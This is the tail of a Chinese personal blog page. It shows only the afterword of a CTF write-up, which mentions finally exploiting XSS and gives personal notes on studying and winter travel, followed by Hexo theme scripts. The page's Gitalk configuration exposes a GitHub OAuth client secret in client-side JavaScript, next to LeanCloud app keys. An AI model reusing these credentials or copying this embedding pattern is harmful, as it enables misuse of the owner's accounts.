<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>xss是很久之前看的了，一直没有像这样进行一次系统的利用过，这次算是了了一桩心愿</p>
<p>大二上学期接下来的日子准备复习四级，复习期末，学一些渗透姿势和python，闲暇时打打ctf，就过去了</p>
<p>十二月了，要买回家的车票了，这次不想坐飞机，看不到沈阳的雪了</p>
<p>周末看了将夜，很久前看过的小说拍剧了，很好看</p>
<p>红墙白雪，要你喜欢。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/29/NCTF-2018/" rel="next" title="NCTF 2018">
                <i class="fa fa-chevron-left"></i> NCTF 2018
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
  <div id="gitalk-container">
  </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="xiangfeng">
            
              <p class="site-author-name" itemprop="name">xiangfeng</p>
              <p class="site-description motion-element" itemprop="description">红墙白雪，要你喜欢</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://yogai.top/" title="Mr.Yoga's Blog" target="_blank">Mr.Yoga's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#checkin"><span class="nav-number">2.</span> <span class="nav-text">checkin</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#babySQLiSPA"><span class="nav-number">3.</span> <span class="nav-text">babySQLiSPA</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SEAFARING1"><span class="nav-number">4.</span> <span class="nav-text">SEAFARING1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后记"><span class="nav-number">5.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xiangfeng</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>





<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">总访客<span id="busuanzi_value_site_uv"></span>人</span>
<span class="post-meta-divider">|</span>

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: 'd259937a31344a1a46ae',
          clientSecret: '3826457715dc3953fd3b9dbbf2b14fe5f439cb8f',
          repo: 'xiangfengwGitalk.github.io',
          owner: 'xiangfengw',
          admin: ['xiangfengw'],
          id: md5(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')
       </script>

  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("z9ObT78TADO2kJRWtcx7KcJ9-gzGzoHsz", "qnQPw2nX4dh8VKCgNAv7LsYv");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
